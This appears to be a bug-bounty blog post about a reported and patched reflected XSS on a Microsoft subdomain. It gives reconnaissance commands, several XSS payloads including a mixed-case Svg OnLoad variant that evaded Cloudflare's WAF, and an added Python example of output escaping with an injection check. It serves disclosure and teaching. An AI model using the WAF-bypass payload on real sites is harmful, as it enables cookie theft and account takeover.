Cloudflare Bypass leads to RXSS [Reflected Cross-Site Scripting] in Microsoft

Prince Roy(RoyzSec)
4 min read · Nov 9, 2023

Har Har Mahadev 🔱. This is Prince Roy, a security researcher, also known as royzsec. Back with another write-up about my latest finding [Cross-Site Scripting] on a Microsoft domain by bypassing Cloudflare. Are you curious about the whole process and my mindset while finding it?

So let’s start! As usual, I use subfinder to collect subdomains. But this time I collected subdomains from https://chaos.projectdiscovery.io/, where you can easily get updated domains. Actually, they update their list every day.

Then with httpx I checked them and gathered all the live domains:

cat microsoftdomains.txt | httpx -mc 200 | tee microsoftlivedomains.txt

Then I checked every domain one by one. I guess on the fourth or fifth domain I found this vulnerability. Actually, that domain's search functionality was vulnerable. So I started with a normal search for “Hello”.

Then I looked at the page source, because just putting in a payload won’t work without understanding the functionality, and Microsoft domains are behind Cloudflare and use the cdnjs CDN [Content Delivery Network].

Source code of the search function:

<div class="search">

<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for Hello">Hello</h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>1 result</div>
</div>

So here, “Hello” was enclosed in an <h1> tag and there was no filtering of the search input. Then I tried closing the </h1> and using normal payloads:

</h1><script>alert(document.cookie)</script>
</h1><img src=x onerror=confirm(document.cookie)>

But both times Cloudflare blocked me.

Then I tried my Brahmastra:

FUZZ</h1><Svg Only=1 OnLoad=confirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgUm95elNlYw=="))>

Most of the time in the past, this payload has helped me bypass the WAF or Cloudflare. When I tried it here, guess what!!

Boom!! The code was injected successfully and the pop-up appeared on the screen. Source code:

<div class="search">

<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for Hello</h1><Svg Only=1 OnLoad=confirm(document.cookie)>">Hello</h1><Svg Only=1 OnLoad=confirm(document.cookie)></h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>0 result</div>
</div>

Closing the </h1> is what allowed the injection, and the mixed lower- and upper-case characters are what bypassed the firewall. Literally, I was like

I reported it quickly, and the next day the MSRC team accepted it as a valid issue.

They patched it within one day. I tried to bypass the fix again, but this function is now pretty safe.

Patched code:

<div class="search">

<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for hello"Svg Only=1 OnLoad=confirmatob"Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="">hello"Svg Only=1 OnLoad=confirmatob"Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="</h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>0 result</div>
</div>
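The root cause shown in the two source listings above is that the search term is reflected, unescaped, into two different HTML contexts at once: the aria-label attribute value and the text content of the <h1>. The patched output suggests the fix strips dangerous characters, but the standard remedy is context-aware output encoding. The following is an added example (not code from the original post or from Microsoft) that models the vulnerable template beside a hardened one and includes a small check a developer can run to see whether a reflected value broke out of its context. The template, the helper names and the sample inputs are all constructed for this illustration.

```python
import html
import re

# Constructed sample inputs (not from the original post): a benign search term
# and an injection attempt of the same shape as the one the write-up describes.
BENIGN_TERM = "Hello"
INJECTION_TERM = "Hello</h1><Svg Only=1 OnLoad=confirm(document.cookie)>"

# A hypothetical template mirroring the markup in the write-up. The term lands
# in two contexts: an attribute value ({label}) and element text ({text}).
TEMPLATE = (
    '<div class="search-header">\n'
    '<h1 class="search-header__search-term" aria-label="Search results for {label}">{text}</h1>\n'
    '<span class="search-header__line-break"></span>\n'
    '<div class="search-header__results-number" id="search-range">'
    '<span class="sr-text"></span>{count} result</div>\n'
    "</div>"
)


def render_vulnerable(term: str, count: int = 0) -> str:
    """Reflects the search term verbatim into both contexts.
    This is the pattern that made the page exploitable: a term containing
    </h1> or a quote can terminate the element or attribute it sits in."""
    return TEMPLATE.format(label=term, text=term, count=count)


def render_hardened(term: str, count: int = 0) -> str:
    """Escapes the term before it reaches either context.
    html.escape(quote=True) turns <, >, &, " and ' into entities, so the
    browser can only ever treat the reflected value as data, never as markup.
    The same escaped string is safe in a double-quoted attribute and in text."""
    safe = html.escape(term, quote=True)
    return TEMPLATE.format(label=safe, text=safe, count=count)


def tag_names(rendered: str) -> list[str]:
    """Returns the sequence of start/end tag names found in a fragment.
    A hardened render can only ever contain the template's own tags."""
    return re.findall(r"</?([A-Za-z][A-Za-z0-9]*)", rendered)


# The tag sequence the template produces on its own, with harmless input.
TEMPLATE_TAGS = tag_names(render_hardened("x"))


def injects_markup(rendered: str) -> bool:
    """True if the fragment contains tags the template itself does not emit,
    i.e. the reflected term escaped its context. Useful as a unit test
    for the search page rather than relying on a WAF to catch payloads."""
    return tag_names(rendered) != TEMPLATE_TAGS


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        print(f"{label}: benign -> {injects_markup(render(BENIGN_TERM))}, "
              f"injection -> {injects_markup(render(INJECTION_TERM))}")
```

The check deliberately compares tag sequences rather than searching for a known payload string: a WAF that matches on `<script` or `onerror=` is exactly what the mixed-case `<Svg OnLoad=` variant in this write-up walked past, whereas output encoding at the reflection point makes the case of the payload irrelevant.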

Priority: P2

Severity: Important

POC:

Impact:

  1. As an attacker, I could use this to steal the victim's cookie, which leads to ATO [Account Takeover].
  2. Disclosure of end-user files, redirecting the user to some other page or site, or modifying the presentation of content.

Hall Of Fame:

Finally, thanks for reading my small blog. If you liked it, please share it with your friends and press the clap button, which inspires me a lot.

Please follow my social media platforms:

LinkedIn: https://www.linkedin.com/in/prince-roy-4b9a75187/

GitHub: https://github.com/royzsec

Twitter: https://twitter.com/royzsec